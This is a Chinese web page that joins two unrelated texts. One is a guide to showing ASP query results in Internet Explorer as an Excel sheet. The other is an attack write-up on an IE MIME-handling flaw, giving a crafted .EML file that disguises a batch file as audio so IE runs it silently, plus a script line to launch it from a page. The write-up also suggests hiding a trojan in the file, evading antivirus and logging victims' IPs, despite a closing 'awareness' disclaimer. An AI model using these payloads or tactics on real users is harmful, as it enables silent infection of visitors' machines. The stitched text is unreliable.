如何在 IE 中使用 Excel 以 MIME 类型显示 ASP 结果

如何在 IE 中使用 Excel 以 MIME 类型显示 ASP 结果,第1张

要执行这些步骤并测试结果,自己需要有:

Microsoft Windows NT Server 4.0 SP3

Microsoft Internet Information Server (IIS) 4.0 版或更高版本

Microsoft SQL Server 6.5 或更高版本

Microsoft Excel 97、Excel 2000 和 Excel 2002

分步过程

使用 ODBC 控制面板小程序创建一个名为“pubs”的系统 DSN。将 DSN 设置为引用您的本地 SQL Server,使用 SQL Server 身份验证,并使用“pubs”作为默认数据库。pubs 数据库的默认登录 ID 是 sa,没有密码。

使用 Notepad.exe 在您的 IIS 主目录(例如 inetpub\wwwroot)中创建一个名为 XlTest.asp 的文件,并向其中添加以下内容:

<%@ Language=VBScript %>

<%

'Change HTML header to specify Excel's MIME content type

Response.Buffer = TRUE

Response.ContentType = "application/vnd.ms-excel"

%>

<HTML>

<BODY>

Here is the info you requested.<p>

<%

' Create ADO Connection object

dim myConnection

set myConnection = CreateObject("ADODB.Connection")

' Open SQL Server Pubs database...

' myConnection.Open "DSN=pubsUID=sa"

' Get a recordset of info from Authors table...

sqlStr = "SELECT au_fname,au_lname,phone FROM authors"

set rsAuthors = myConnection.Execute(sqlStr)

%>

<!-- Our table which will be translated into an Excel spreadsheet -->

<TABLE WIDTH=75% BORDER=1 CELLSPACING=1 CELLPADDING=1>

<TR>

<TD><font size=+2>First Name</font></TD>

<TD><font size=+2>Last Name</font></TD>

<TD><font size=+2>Phone</font></TD>

</TR>

<!-- server-side loop adding Table entries -->

<% do while not rsAuthors.EOF %>

<TR>

<TD><%=rsAuthors("au_fname")%></TD>

<TD><%=rsAuthors("au_lname")%></TD>

<TD><%=rsAuthors("phone")%></TD>

</TR>

<% rsAuthors.MoveNext

loop

' Clean up

rsAuthors.Close

set rsAuthors = Nothing

myConnection.Close

set myConnection = Nothing

%>

</TABLE>

</BODY>

</HTML>

保存 XlTest.asp,然后从客户端浏览器查看它。

相信对微软件IE浏览器的这个重大安全漏洞,很多人都有所耳闻。就其原理来说,IE浏览器在处理MIME头中"content-type"处特定的某些类型时存在问题。由此导至功击者可以得用这个缺陷在IE客户端执行任意指令,或EXE,BAT等文件!

 具体一些来说,对方可以构造如下一个特殊的.EML文件:

Content-Type: multipart/relatedboundary="1"

--1

Content-Type: multipart/alternativeboundary="2"

--2

Content-Type: text/html

Content-Transfer-Encoding: quoted-printable

<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>

--1

Content-Type: audio/x-wavname="test.bat"

Content-Transfer-Encoding: base64

Content-ID: <THE-CID>

command.com

一般情况下,EML文件是与OE相关联的,但由于 这封邮件是HTML格式的,所以最终还是调用IE对其进行解释。而此处,IE会错误的处理"content-type:audio/x-wav"

,从而导至test.bat无提示下载,并自动执行!

具体对其利用时,可以在一个正常的网页源码中加入这样的指令:

<script language="java script">

window.open("test.eml",null,resizable=no,top=1000,left=1000")

</script>

上面EML源文件中是对.bat文件的调用。如果要对.EXE文件调用,则需要将文件经base64编码。手动做这项工作几乎是不可能的事,这里推荐给各位一个专门做此工作的软件EMl.EXE。它可以轻松实现对EXE文件的base64编码!聪明的朋友也许早已经想到可以在这里使用木马了,的确这是个"不错"的想法。而为了使你隐藏在网页中的木马不被杀毒软件发现,最好先对此木马做些手脚,具体方法参见绿色兵团谭术写的《反特征码及特洛伊木马躲避查毒软件技术详解》。

也许有人想到,自己如此精心策划,可是如何知道有谁浏览过自己的网页中了木马呢?简单!太极链的计数器不是有记录浏览者IP的功能吗?在网页中加个这样的计数器不就OK了吗?

Notice:据传网上早有人用过累似的方法,在下收集有关资料小做分析后做出此文,意在对其揭示,以提高广大网民上网警惕性!如有人依此法"为非作歹",皆与本人无关,请勿自误!:P


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/tougao/11341819.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-05-15
下一篇 2023-05-15

发表评论

登录后才能评论

评论列表(0条)

保存